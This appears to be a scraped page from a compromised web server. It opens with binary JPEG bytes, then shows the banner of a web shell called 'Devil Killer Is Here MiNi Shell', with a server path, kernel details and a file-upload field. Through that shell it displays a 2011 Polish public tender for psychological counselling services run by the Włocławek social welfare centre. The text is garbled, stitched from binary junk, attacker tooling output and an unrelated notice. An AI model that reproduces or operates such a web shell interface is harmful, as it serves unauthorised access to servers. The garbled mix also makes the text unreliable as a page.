JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110420/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110420/86630-N-2011.html

<p class="kh_header"><b>Włocławek: Usługi poradnictwa psychologicznego dla uczestników projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek</b><br>
<b>Numer ogłoszenia: 86630 - 2011; data zamieszczenia: 20.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Kościuszki 26, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4116399, faks 054 4116399.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mopr.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi poradnictwa psychologicznego dla uczestników projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi poradnictwa psychologiczne dla (w zależności od części zamówienia) osób bezrobotnych zagrożonych wykluczeniem społecznym, osób niepełnosprawnych, wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych, osób uzależnionych i współuzależnionych oraz DDA, rodzin bezrobotnych zagrożonych wykluczeniem społecznym - uczestników projektu Aktywna Integracja - Projekt Systemowy MOPR Włocławek realizowanego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet VII Promocja Aktywnej Integracji, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej.
2. Przedmiot zamówienia składa się z siedmiu części:
1) CZĘŚĆ I - poradnictwo psychologa rodzinnego. Wykonawca zobowiązany jest do przeprowadzenia zajęć poradnictwa grupowego dla:
a) Grupy Wsparcia Nr 3 - 12 osobowej,
b) PAL Nr 5 - 5 osobowej,
c) PAL Nr 6 - 5 osobowej.
Łącznie w ilości 144 godzin (45 minutowych).
2) CZĘŚĆ II - poradnictwo psychologiczne indywidualne i grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć poradnictwa grupowego i poradnictwa indywidualnego dla:
a) Grupy Wsparcia Nr 19 a - 10 osobowej,
b) Grupy Wsparcia Nr 19 b - 10 osobowej,
c) Grupy Wsparcia Nr 23 - 20 osobowej.
Łącznie w ilości 216 godzin (45 minutowych) zajęć grupowych oraz 420 godzin (60 minutowych) poradnictwa indywidualnego.
3) CZĘŚĆ III - poradnictwo psychologiczne indywidualne i grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć poradnictwa grupowego i poradnictwa indywidualnego dla:
a) Grupy Wsparcia Nr 10 - 12 osobowej,
b) Grupy Wsparcia Nr 11 - 12 osobowej,
c) Grupy Wsparcia Nr 22a - 10 osobowej,
d) Grupy Wsparcia Nr 22 b - 10 osobowej,
e) PAL Nr 4 - 20 osobowej.
Łącznie w ilości 104 godzin (45 minutowych) zajęć grupowych oraz 120 godzin (60 minutowych) poradnictwa indywidualnego.
4) CZĘŚĆ IV - poradnictwo psychologiczne grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć poradnictwa grupowego dla:
a) Grupy Wsparcia Nr 6 - 12 osobowej,
b) Grupy Wsparcia Nr 7 - 12 osobowej,
c) Grupy Wsparcia Nr 8 - 12 osobowej,
d) Grupy Wsparcia Nr 9 - 12 osobowej,
e) PAL Nr 1 - 10 osobowa,
f) PAL Nr 3 - 10 osobowa.
Łącznie w ilości 119 godzin (45 minutowych).
5) CZĘŚĆ V - poradnictwo psychologiczne indywidualne i grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć poradnictwa grupowego i poradnictwa indywidualnego dla:
a) Grupy Wsparcia Nr 3 - 12 osobowej,
b) Grupy Wsparcia Nr 20 a - 10 osobowej,
c) Grupy Wsparcia Nr 20 b - 10 osobowej,
d) Grupy Wsparcia Nr 21 - 10 osobowej,
e) Grupy Wsparcia Nr 24 - 10 osobowej,
Łącznie w ilości 159 godzin (45 minutowych) poradnictwa grupowego oraz 280 godzin (60 minutowych) poradnictwa indywidualnego.
6) CZĘŚĆ VI - poradnictwo psychologiczne grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć wsparcia grupowego dla:
a) Grupy Wsparcia Nr 1 - 12 osobowej,
b) Grupy Wsparcia Nr 2 - 12 osobowej,
c) Grupy Wsparcia Nr 4 - 12 osobowej,
d) Grupy Wsparcia Nr 16 - 12 osobowej,
e) Grupy Wsparcia Nr 17 - 12 osobowej,
f) PAL Nr 2 - 10 osobowej.
Łącznie 99 godzin (45 minutowych).
7) CZĘŚĆ VII - poradnictwo psychologiczne grupowe. Wykonawca zobowiązany jest do przeprowadzenia zajęć wsparcia grupowego dla:
a) Grupy Wsparcia Nr 5 - 12 osobowej,
b) Grupy Wsparcia Nr 12 - 12 osobowej,
c) Grupy Wsparcia Nr 13 - 12 osobowej,
d) Grupy Wsparcia Nr 14 - 12 osobowej,
e) Grupy Wsparcia Nr 15 - 12 osobowej.
Łącznie 140 godzin (45 minutowych).
3. Każda z opisanych w pkt 2 części stanowi odrębną część zamówienia.
4. Miejsce świadczenia usług oraz dokładny harmonogram zajęć (dni i godziny zajęć) określają:
1) Harmonogram zajęć dla CZĘŚCI I zamówienia, który stanowi Załącznik Nr 1 do SIWZ,
2) Harmonogram zajęć dla CZĘSCI II zamówienia, który stanowi Załącznik Nr 2 do SIWZ,
3) Harmonogram zajęć dla CZĘŚCI III zamówienia, który stanowi Załącznik Nr 3 do SIWZ,
4) Harmonogram zajęć dla CZĘŚCI IV zamówienia, który stanowi Załącznik Nr 4 do SIWZ,
5) Harmonogram zajęć dla CZĘŚCI V zamówienia, który stanowi Załącznik Nr 5 do SIWZ,
6) Harmonogram zajęć dla CZĘŚCI VI zamówienia, który stanowi Załącznik Nr 6 do SIWZ,
7) Harmonogram zajęć dla CZĘŚCI VII zamówienia, który stanowi Załącznik Nr 7 do SIWZ.
5. Prowadzenie grupowego poradnictwa psychologicznego przez psychologa rodzinnego CZĘŚĆ I ZAMÓWIENIA, musi obejmować pracę z rodzicami z problemem pełnienia ról społecznych, z problemami wychowawczymi w zakresie:
1) komunikacji rodzinnej - nazywanie i wyrażanie emocji, sposoby rozwiązywania sytuacji konfliktowych - konstruktywny spór, komunikaty typu ja,
2) rozwijanie kompetencji rodzicielskich - wykorzystywanie elementów systemowego rozumienia rodziny (cyrkularność, sprzężenia zwrotne, granice w rodzinie), charakterystyka funkcjonowania zdrowego systemu rodzinnego, charakterystyka dysfunkcjonalnego systemu rodzinnego, test kompetencji rodzicielskich, styli wychowania, omówienie specyfiki funkcjonowania rodziny z dzieckiem w wieku szkolnym, z adolescentem - proces separacji - indywiduacji, wiązanie w rodzinie,
3) radzenia sobie ze stresem ćwiczenia umiejętności zaradczych,
4) diagnoza systemu rodzinnego - praca z genogramem, rysunek rodziny, wywiad rodzinny,
5) przemoc w rodzinie - rodzaje przemocy, skutki i przeciwdziałanie.
6. Wykonawca składający ofertę na CZĘŚĆ I ZAMÓWIENIA musi sporządzić jego program, z podaniem: proponowanego programu zajęć, zakresu tematycznego, sposobu przeprowadzenia poradnictwa w tym metod i form jego prowadzenia oraz wykorzystywanych narzędzi. Program poradnictwa stanowić będzie element oceny ofert w kryterium jakość oferowanej usługi. Wykonawca zobowiązany jest uwzględnić godzinowy wymiar zajęć dla poszczególnych grup:
- Grupa Wsparcia Nr 3: 16 godzinny program,
- PAL Nr 5: 64 godzinny program,
- PAL Nr 6: 64 godzinny program.
7. Prowadzenie grupowego poradnictwa psychologicznego dla Grup Wsparcia od Nr 1 do Nr 17 oraz PAL od Nr 1 do Nr 4 w zakresie kształtowania umiejętności społecznych oraz rozwoju osobistego, i komunikacji interpersonalnej obejmować musi:
1) asertywność,
2) komunikację społeczną,
3) wzmocnienie samooceny i poczucia własnej wartości,
4) radzenie sobie ze stresem i przezwyciężanie problemów życiowych,
5) naukę stawiania sobie celów i sposobów ich realizacji.
8. Wykonawca, składający ofertę na część zamówienia, która obejmuje prowadzenie opisanego w pkt 7 poradnictwa musi sporządzić jego program, z podaniem: proponowanego programu zajęć, zakresu tematycznego, sposobu przeprowadzenia poradnictwa w tym metod i form jego prowadzenia oraz wykorzystywanych narzędzi. Program poradnictwa stanowić będzie element oceny ofert w kryterium jakość oferowanej usługi. Wykonawca zobowiązany jest uwzględnić godzinowy wymiar zajęć dla poszczególnych grup wsparcia:
1) CZĘŚĆ III ZAMÓWIENIA - Grupa Wsparcia Nr 10: 12 godzinny program. Grupa Wsparcia Nr 11: 24 godzinny program. PAL Nr 4: 2 grupy 10 osobowe z 10 godzinnym programem każda.
2) CZĘŚĆ IV ZAMÓWIENIA - Grupa Wsparcia Nr 6: 20 godzinny program. Grupa Wsparcia Nr 7: 25 godzinny program. Grupa Wsparcia Nr 8: 20 godzinny program. Grupa Wsparcia Nr 9: 22 godzinny program. PAL Nr 1: 20 godzinny program. PAL Nr 3: 12 godzinny program.
3) CZĘŚĆ V ZAMÓWIENIA - Grupa Wsparcia Nr 3: 15 godzinny program.
4) CZĘŚĆ VI ZAMÓWIENIA - Grupa Wsparcia Nr 1: 20 godzinny program. Grupa Wsparcia Nr 2: 20 godzinny program. Grupa Wsparcia Nr 4: 18 godzinny program. Grupa Wsparcia Nr 16: 15 godzinny program (z uwzględnieniem, że grupę stanowią wychowankowie placówek opiekuńczo-wychowawczych). Grupa Wsparcia Nr 17: 20 godzinny program (z uwzględnieniem, że grupę stanowią rodzice zastępczy). PAL Nr 2: 6 godzinny program.
5) CZĘŚĆ VII ZAMÓWIENIA - Grupa Wsparcia Nr 5: 20 godzinny program. Grupy Wsparcia od Nr 12 do Nr 15: 30 godzinny program (z uwzględnieniem, że grupy te stanowią osoby niepełnosprawne).
9. Prowadzenie grupowego poradnictwa psychologicznego dla Grup Wsparcia od Nr 19 do Nr 24 musi obejmować tematykę:
1) diagnozowanie wzorców zachowania, typów osobowości i zaburzeń osobowości,
2) uzależnienia i współuzależnienia,
3) asertywności,
4) zarządzania czasem,
5) treningu interpersonalnego,
6) programowania neurolingwistycznego.
10. Wykonawca, składający ofertę na część zamówienia, która obejmuje prowadzenie opisanego w pkt 9 poradnictwa musi sporządzić jego program, z podaniem: proponowanego programu zajęć, zakresu tematycznego, sposobu przeprowadzenia poradnictwa w tym metod i form jego prowadzenia oraz wykorzystywanych narzędzi. Program poradnictwa stanowić będzie element oceny ofert w kryterium jakość oferowanej usługi. Wykonawca zobowiązany jest uwzględnić godzinowy wymiar zajęć dla poszczególnych grup wsparcia:
1) CZĘŚĆ II ZAMÓWIENIA - Grupa Wsparcia Nr 19a: 72 godzinny program. Grupa Wsparcia Nr 19b: 72 godzinny program. Grupa Wsparcia Nr 23: 2 grupy 10 osobowe z 36 godzinnym programem dla każdej.
2) CZĘŚĆ III ZAMÓWIENIA - Grupa Wsparcia Nr 22a: 24 godzinny program. Grupa Wsparcia Nr 22b: 24 godzinny program.
3) CZĘŚĆ V ZAMÓWIENIA - Grupa Wsparcia Nr 20a: 24 godzinny program. Grupa Wsparcia Nr 20b: 24 godzinny program. Grupa Wsparcia Nr 21: 48 godzinny program. Grupa Wsparcia Nr 24: 48 godzinny program.
11. Prowadzenie indywidualnego poradnictwa dla osób z Grup Wsparcia od Nr 19 do Nr 24 musi obejmować tematykę:
1) uzależnienia i współuzależnienia,
2) diagnozowania wzorców zachowania,
3) typów osobowości i zaburzeń osobowości,
4) programowania neurolingwistycznego.
Wykonawca dostosuje zakres poradnictwa do sytuacji konkretnych osób nim objętych.
12. Usługi poradnictwa psychologicznego muszą być realizowane przez osobę (osoby) posiadającą(e) następujące kwalifikacje:
1) ukończone studia psychologiczne w polskiej szkole wyższej, zakończone uzyskaniem dyplomu z tytułem magistra psychologii lub wykształcenie uzyskane za granicą uznane w Polsce za równorzędne, zakończone uzyskaniem dyplomu z tytułem magistra psychologii; lub dyplom magistra filozofii chrześcijańskiej ze specjalizacją psychologiczno - filozoficzną, wydany do 1981r. przez Katolicki Uniwersytet Lubelski; bądź dyplom magistra filozofii chrześcijańskiej w zakresie psychologii wydany przez Akademię Teologii Katolickiej w Warszawie przed 1993r., a od 1 stycznia 1993r. - dyplom magistra psychologii uzyskany na tejże uczelni;
2) minimum roczny staż pracy, potwierdzony dokumentami,
3) posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych,
4) niekaralność za przestępstwo popełnione umyślnie,
5) doświadczenie w pracy:
a) z rodzinami bezrobotnymi, zagrożonymi wykluczeniem społecznym, doświadczenie w zakresie podobnych zadań - DOTYCZY CZĘŚCI I ZAMÓWIENIA,
b) z osobami bezrobotnymi, zagrożonymi wykluczeniem społecznym (grupy wsparcia od Nr 1 do Nr 11), doświadczenie w zakresie podobnych zadań - DOTYCZY CZĘŚCI III, IV, V, VI oraz VII ZAMÓWIENIA,
c) z osobami niepełnosprawnymi (grupy wsparcia od Nr 12 do Nr 15), doświadczenie w zakresie podobnych zadań - DOTYCZY CZĘŚCI VII ZAMÓWIENIA,
d) z wychowankami rodzin zastępczych i placówek opiekuńczo - wychowawczych oraz rodzicami zastępczymi (grupy wsparcia od Nr 16 do Nr 17), doświadczenie w zakresie podobnych zadań - DOTYCZY CZĘŚCI VI ZAMÓWIENIA.
13. Kwalifikacje zawodowe osób przeznaczonych do bezpośredniej realizacji usług poradnictwa psychologicznego oraz ich doświadczenie zawodowe w pracy z osobami (zależnie od części zamówienia) stanowić będzie element oceny ofert w kryterium jakość oferowanej usługi.
14. W przypadku, gdy wykonawca zaoferuje do wykonywania zamówienia więcej niż jednego psychologa zobowiązany jest wskazać, dla których grup i w jakim zakresie godzinowym każda z podanych w ofercie osób będzie realizowała zajęcia.
15. Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
16. Wykonawca (psycholog) zobowiązany jest prowadzić dokumentację z przebiegu usług, na którą składają się następujące dokumenty:
1) Arkusz indywidualnych konsultacji z psychologiem - wzór druku stanowi Załącznik nr 8 do SIWZ,
2) Lista obecności uczestnika indywidualnych konsultacji z psychologiem - wzór druku stanowi Załącznik Nr 9 do SIWZ,
3) Arkusz grupowego spotkania z psychologiem - wzór druku stanowi Załącznik Nr 10 do SIWZ,
4) Lista obecności biorących udział w grupowym spotkaniu z psychologiem Załącznik Nr 11 do SIWZ.
17. Wykonawca rozliczał się będzie z Zamawiającym z wykonanych usług miesięcznie - niezależnie od ilości prowadzonych zajęć w okresie od pierwszego do ostatniego dnia danego miesiąca kalendarzowego. Rozliczenie dokonywane będzie na druku pn. Miesięczna karta czasu pracy wykonawcy w ramach projektu - wzór druku stanowi Załącznik Nr 12 do SIZW. Miesięczna karta będzie podstawą do wypłaty wynagrodzenia:
1) zgodnie z zawartą umową zlecenia - w przypadku osób fizycznych nieprowadzących działalności gospodarczej, po wystawieniu przez nie rachunku;
2) zgodnie z zawartą umową o realizację usług - w przypadku podmiotów prowadzących działalność gospodarczą, po wystawieniu przez nie faktury lub rachunku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje szczególnego sposobu dokonywania oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje szczególnego sposobu dokonywania oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje szczególnego sposobu dokonywania oceny tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zapewnić potencjał kadrowy niezbędny do realizacji usług psychologicznych w osobach:
1) psychologa, który posiada wykształcenie i kwalifikacje opisane w rozdziale II pkt 12 SIWZ,
2) potwierdzeniem spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia jest sporządzenie przez wykonawcę wykazu kadry, uwzględniającego wymogi zamawiającego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku wykonawca potwierdza poprzez posiadanie opłaconej i ważnej polisy od odpowiedzialności cywilnej, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia, na sumę ubezpieczenia w wysokości 10.000,00 zł na wszystkie zdarzenia na każdą z części, na którą wykonawca składa ofertę. W przypadku składania oferty na CZĘŚĆ II oraz CZĘŚĆ V zamówienia części wymagana jest polisa na sumę ubezpieczenia w wysokości 20.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) opis programów poradnictwa grupowego w zależności od części zamówienia, na którą wykonawca składa ofertę z uwzględnieniem wymogów określonych w Rozdziale II pkt 5 - 10 SIWZ (SPORZĄDZA WYKONAWCA);
2) dyplom z tytułem magistra psychologii lub równoważny zgodnie z wymaganiami określonymi w rozdziale II pkt 12 ppkt 1 SIWZ - dotyczy bezpośrednich realizatorów usługi;
3) życiorys w formie CV, uwzględniający kwalifikacje zawodowe oraz doświadczenie w pracy z osobami (zależnie od części zamówienia patrz Rozdział II pkt 12 ppkt 2 oraz ppkt 5 SIWZ) - dotyczy bezpośrednich realizatorów usługi (SPORZĄDZA WYKONAWCA);
4) dokumenty potwierdzające posiadane kwalifikacje i doświadczenie zawarte w życiorysie, o którym mowa w ppkt 2 - dotyczy bezpośrednich realizatorów usług;
5) oświadczenie, że bezpośredni realizatorzy usług posiadają pełną zdolność do czynności prawnych oraz korzystają z pełni praw publicznych;
6) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 -8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - dotyczy bezpośrednich realizatorów usługi.</p></li>



